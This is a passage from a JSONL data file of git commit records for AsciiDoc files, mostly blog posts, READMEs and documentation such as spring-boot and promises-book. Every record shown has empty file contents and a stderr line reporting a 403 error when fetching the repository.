'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f53e6dabe13440123bb3c6af6924f1dfc5b8709","subject":"Update 2016-08-21-Chove-Chuva.adoc","message":"Update 2016-08-21-Chove-Chuva.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-21-Chove-Chuva.adoc","new_file":"_posts\/2016-08-21-Chove-Chuva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c0ea3e4fce1afc394a03f4229bbc15efa2019ec","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e72435e4b659eba04f2021099c8298d11aa4ddb4","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5da1bb07aa6ad3d74fed5b78e6429162c5c6a6fa","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d39b774b2d859c52a6d9b240950efe22099ca6c","subject":"Update 2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","message":"Update 2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","new_file":"_posts\/2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faf648361c8f49de1eb8e434a441e88f35ddc51","subject":"Update 2017-01-18-A-Fresh-Poem.adoc","message":"Update 2017-01-18-A-Fresh-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-18-A-Fresh-Poem.adoc","new_file":"_posts\/2017-01-18-A-Fresh-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d914ac1ff2275ce2339e94ae2d41ca0c98bb7c36","subject":"re-added readme with instructions for git submodule of yajsw","message":"re-added readme with instructions for git submodule of yajsw\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"tools\/README.asciidoc","new_file":"tools\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66173abd67f6089d0c90121af0e49fd0584ecc0d","subject":"Adding Docker readme file","message":"Adding Docker readme file\n","repos":"kpiwko\/arquillian-safari,kpiwko\/arquillian-safari","old_file":"arquillian-docker-scenario\/README.adoc","new_file":"arquillian-docker-scenario\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kpiwko\/arquillian-safari.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96ca3e0c0f9c184397aede177638dd287d80b948","subject":"Polish","message":"Polish\n\nAdd missing documentation\n\nSee gh-4220\n","repos":"tiarebalbi\/spring-boot,tsachev\/spring-boot,izeye\/spring-boot,ameraljovic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,yhj630520\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,dreis2211\/spring-boot,donhuvy\/spring-boot,sbuettner\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot-concourse,NetoDevel\/spring-boot,mbenson\/spring-boot,lucassaldanha\/spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,rweisleder\/spring-boot,brettwooldridge\/spring-boot,lenicliu\/spring-boot,hello2009chen\/spring-boot,tsachev\/spring-boot,mbogoevici\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,spring-projects\/spring-boot,joansmith\/spring-boot,lucassaldanha\/spring-boot,lexandro\/spring-boot,jxblum\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,dfa1\/spring-boot,mdeinum\/spring-boot,xiaoleiPENG\/my-project,DeezCashews\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,chrylis\/spring-boot,jayarampradhan\/spring-boot,habuma\/spring-boot,tsachev\/spring-boot,thomasdarimont\/spring-boot,zhanhb\/spring-boot,herau\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,hello2009chen\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,aahlenst\/spring-boot,pvorb\/spring-boot,wilkinsona\/spring-boot,neo4j-contrib\/spring-boot,jayarampradhan\/spring-boot,spring-projects\/spring-boot,dfa1\/spring-boot,vakninr\/spring-boot,ilayaperumalg\/spring-boot,aahlenst\/spring-boot,felipeg48\/spring-boot,bbrouwer\/spring-boot,shakuzen\/spring-boot,joshthornhill\/spring-boot,izeye\/spring-boot,bbrouwer\/spring-boot,sbuettner\/spring-boot,ihoneymon\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,habuma\/spring-boot,bjornlindstrom\/spring-boot,isopov\/spring-boot,tiarebalbi\/spring-boot,i007422\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,olivergierke\/spring-boot,sbcoba\/spring-boot,royclarkson\/spring-boot,joansmith\/spring-boot,cleverjava\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,shangyi0102\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,isopov\/spring-boot,pvorb\/spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,ollie314\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,joansmith\/spring-boot,mbenson\/spring-boot,candrews\/spring-boot,ihoneymon\/spring-boot,hqrt\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,minmay\/spring-boot,joansmith\/spring-boot,joansmith\/spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,htynkn\/spring-boot,sbuettner\/spring-boot,lenicliu\/spring-boot,habuma\/spring-boot,dfa1\/spring-boot,minmay\/spring-boot,joshiste\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,linead\/spring-boot,Buzzardo\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,dreis2211\/spring-boot,isopov\/spring-boot,lenicliu\/spring-boot,i007422\/jenkins2-course-spring-boot,yhj630520\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,sebastiankirsch\/spring-boot,jmnarloch\/spring-boot,pvorb\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,lburgazzoli\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shakuzen\/spring-boot,lexandro\/spring-boot,wilkinsona\/spring-boot,drumonii\/spring-boot,mrumpf\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,dfa1\/spring-boot,cleverjava\/jenkins2-course-spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,vpavic\/spring-boot,htynkn\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,ihoneymon\/spring-boot,neo4j-contrib\/spring-boot,vakninr\/spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,brettwooldridge\/spring-boot,shangyi0102\/spring-boot,xiaoleiPENG\/my-project,mbogoevici\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,aahlenst\/spring-boot,hqrt\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,izeye\/spring-boot,sbcoba\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,zhangshuangquan\/spring-root,jbovet\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,sebastiankirsch\/spring-boot,akmaharshi\/jenkins,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,DeezCashews\/spring-boot,michael-simons\/spring-boot,bijukunjummen\/spring-boot,javyzheng\/spring-boot,ihoneymon\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,akmaharshi\/jenkins,dfa1\/spring-boot,javyzheng\/spring-boot,mosoft521\/spring-boot,yangdd1205\/spring-boot,kdvolder\/spring-boot,zhanhb\/spring-boot,bijukunjummen\/spring-boot,ameraljovic\/spring-boot,hello2009chen\/spring-boot,kamilszymanski\/spring-boot,afroje-reshma\/spring-boot-sample,jvz\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,mrumpf\/spring-boot,royclarkson\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vakninr\/spring-boot,donhuvy\/spring-boot,i007422\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,vpavic\/spring-boot,bijukunjummen\/spring-boot,akmaharshi\/jenkins,michael-simons\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot-concourse,eddumelendez\/spring-boot,bclozel\/spring-boot,neo4j-contrib\/spring-boot,jxblum\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot-concourse,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,bclozel\/spring-boot,habuma\/spring-boot,bbrouwer\/spring-boot,bjornlindstrom\/spring-boot,mbenson\/spring-boot,ameraljovic\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,jayarampradhan\/spring-boot,lucassaldanha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,Nowheresly\/spring-boot,candrews\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,thomasdarimont\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,ollie314\/spring-boot,ameraljovic\/spring-boot,kdvolder\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,neo4j-contrib\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,sbcoba\/spring-boot,joshthornhill\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,sebastiankirsch\/spring-boot,yangdd1205\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,jmnarloch\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,DeezCashews\/spring-boot,tsachev\/spring-boot,zhanhb\/spring-boot,candrews\/spring-boot,jayarampradhan\/spring-boot,herau\/spring-boot,mrumpf\/spring-boot,ollie314\/spring-boot,eddumelendez\/spring-boot,qerub\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,izeye\/spring-boot,qerub\/spring-boot,linead\/spring-boot,zhangshuangquan\/spring-root,yangdd1205\/spring-boot,Buzzardo\/spring-boot,herau\/spring-boot,donhuvy\/spring-boot,bjornlindstrom\/spring-boot,sebastiankirsch\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,mosoft521\/spring-boot,herau\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,afroje-reshma\/spring-boot-sample,ameraljovic\/spring-boot,mdeinum\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,olivergierke\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mdeinum\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,jbovet\/spring-boot,izeye\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,mbogoevici\/spring-boot,isopov\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,brettwooldridge\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,royclarkson\/spring-boot,olivergierke\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,jbovet\/spring-boot,brettwooldridge\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,joshiste\/spring-boot,joshiste\/spring-boot,xiaoleiPENG\/my-project,joshiste\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,zhangshuangquan\/spring-root,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,kamilszymanski\/spring-boot,deki\/spring-boot,sbcoba\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,lucassaldanha\/spring-boot,Nowheresly\/spring-boot,Nowheresly\/spring-boot,kamilszymanski\/spring-boot,eddumelendez\/spring-boot,linead\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,chrylis\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,hqrt\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,Nowheresly\/spring-boot,ollie314\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,kamilszymanski\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,tiarebalbi\/spring-boot,zhangshuangquan\/spring-root,sbuettner\/spring-boot,olivergierke\/spring-boot,sbuettner\/spring-boot,akmaharshi\/jenkins,jvz\/spring-boot,tiarebalbi\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"193f20d61151dd9709be57ee757c652527b654af","subject":"Update 2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","message":"Update 2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","new_file":"_posts\/2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"150a649461b43ada7f738c0c8a1046d777ca46a4","subject":"Add psql cheatsheet","message":"Add psql cheatsheet\n","repos":"Stratus3D\/dotfiles,Stratus3D\/dotfiles,Stratus3D\/dotfiles","old_file":"guides\/psql_cheatsheet.adoc","new_file":"guides\/psql_cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Stratus3D\/dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cd6efeaf6d40c065da6f338988e44dd74771dec","subject":"Update 2016-06-28-title-avout-a-thing.adoc","message":"Update 2016-06-28-title-avout-a-thing.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-title-avout-a-thing.adoc","new_file":"_posts\/2016-06-28-title-avout-a-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14cc217e6c3bc58e44f7d1aa2a98dac4a7bb6291","subject":"added instance groups; issue #57","message":"added instance groups; issue #57\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"instance-groups\/readme.adoc","new_file":"instance-groups\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea8ca5d6f38ae8fde5d9f1b4e4b7521c1b261e63","subject":"write(column-promise-resolve): \u975e\u540c\u671f\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306e\u89e3\u8aac\u3092\u8ffd\u52a0","message":"write(column-promise-resolve): \u975e\u540c\u671f\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306e\u89e3\u8aac\u3092\u8ffd\u52a0\n\n\u3042\u304f\u307e\u3067\u975e\u540c\u671f\u3067\u5b9f\u884c\u3055\u308c\u308b\u306e\u306fPromise\u306e\u4ed5\u69d8\u306b\u3088\u308b\u3082\u306e\n\n\u3000\nresolve #167\n","repos":"charlenopires\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,purepennons\/promises-book,mzbac\/promises-book,oToUC\/promises-book,liubin\/promises-book,azu\/promises-book,genie88\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,dieface\/promises-book,liubin\/promises-book,sunfurong\/promise,liubin\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,oToUC\/promises-book,azu\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,azu\/promises-book,cqricky\/promises-book,azu\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,wenber\/promises-book,charlenopires\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,sunfurong\/promise,cqricky\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,purepennons\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,genie88\/promises-book","old_file":"Ch2_HowToWrite\/column-promise-resolve.adoc","new_file":"Ch2_HowToWrite\/column-promise-resolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"793398e8d824ae9877326c090870edbd5bb34328","subject":"chore(notification-thenable): \u6bb5\u843d\u3092\u4fee\u6b63","message":"chore(notification-thenable): \u6bb5\u843d\u3092\u4fee\u6b63\n","repos":"liyunsheng\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,azu\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,genie88\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,azu\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,cqricky\/promises-book,dieface\/promises-book,genie88\/promises-book,cqricky\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,oToUC\/promises-book,azu\/promises-book,liubin\/promises-book,sunfurong\/promise,liubin\/promises-book,mzbac\/promises-book,sunfurong\/promise,mzbac\/promises-book,oToUC\/promises-book,wenber\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,wenber\/promises-book","old_file":"Ch4_AdvancedPromises\/resolve-thenable.adoc","new_file":"Ch4_AdvancedPromises\/resolve-thenable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3103c419ab30986a6decde7b27010f4d5c29d26d","subject":"Update 2016-07-22-prova.adoc","message":"Update 2016-07-22-prova.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-prova.adoc","new_file":"_posts\/2016-07-22-prova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"999656e6f8835fa10a7735d40f974ee35f5f4517","subject":"Python: variable is defined?","message":"Python: variable is defined?\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c6f92f3c4b238e0b41b06cbe79ece83c70ae8fea","subject":"Added readme","message":"Added readme\n","repos":"Frege\/frege-gradle-plugin,breskeby\/frege-gradle-plugin,breskeby\/frege-gradle-plugin,Frege\/frege-gradle-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/breskeby\/frege-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6afdb9417b070ef8239f562f4ce92010022494bf","subject":"Updated README to clarify minimum version requirements for cargo\/rustc","message":"Updated README to clarify minimum version requirements for cargo\/rustc\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6499476503aabfc42cc4d994331fad4d6f12fcfb","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5cd4902d9b72187e01fe592c2a9709579999d62","subject":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","message":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2df34aadd77483f19a817806e0ff6822a12ccc9b","subject":"Update 2016-06-28-About.adoc","message":"Update 2016-06-28-About.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-About.adoc","new_file":"_posts\/2016-06-28-About.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0362e782af8895dce841cb816ef2fff19972ed03","subject":"Update 2019-01-31-Titre.adoc","message":"Update 2019-01-31-Titre.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Titre.adoc","new_file":"_posts\/2019-01-31-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1812d11f72b98161d755f484196e5c5781b4383e","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 